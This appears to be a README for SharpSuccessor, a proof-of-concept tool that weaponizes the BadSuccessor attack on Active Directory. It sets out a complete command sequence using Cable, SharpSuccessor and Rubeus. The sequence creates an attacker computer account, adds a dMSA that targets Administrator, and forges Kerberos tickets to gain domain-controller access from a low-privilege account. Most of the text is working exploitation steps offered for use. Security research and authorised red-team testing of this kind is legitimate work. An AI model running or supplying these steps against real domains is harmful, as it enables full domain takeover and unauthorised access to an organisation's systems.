SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai. A low privilege user with CreateChild permissions over any Organizational Unit (OU) in the Active Directory domain can escalate privileges to domain administrator.
From low-privilege user context, first create a computer object with a tool such as Cable:
Cable.exe computer /add /name:attacker_computer /password:P@ssw0rd
Then use SharpSuccessor to add and weaponize the dMSA object:
SharpSuccessor.exe add /target:Administrator /path:"ou=test,dc=lab,dc=lan" /computer:attacker_computer$ /name:attacker_dMSA
Finally use the previously created computer account to request a ticket as the dMSA. First requesting a TGT for the computer account:
Rubeus.exe asktgt /user:attacker_computer$ /password:P@ssw0rd /enctype:aes256 /opsec /nowrap
Then use that tgt to impersonate the dMSA account:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF0DCCBcy...
Now you can request a service ticket with Administrator context for any SPN, including the Domain Controllers for post-exploitation. For example here I will show admin privileges for SMB on the domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...
Now that we have the ticket in memory, we can test access:
Massive thanks to Jim Sykora and Garrett Foster for the inspirations and assistance for this tool!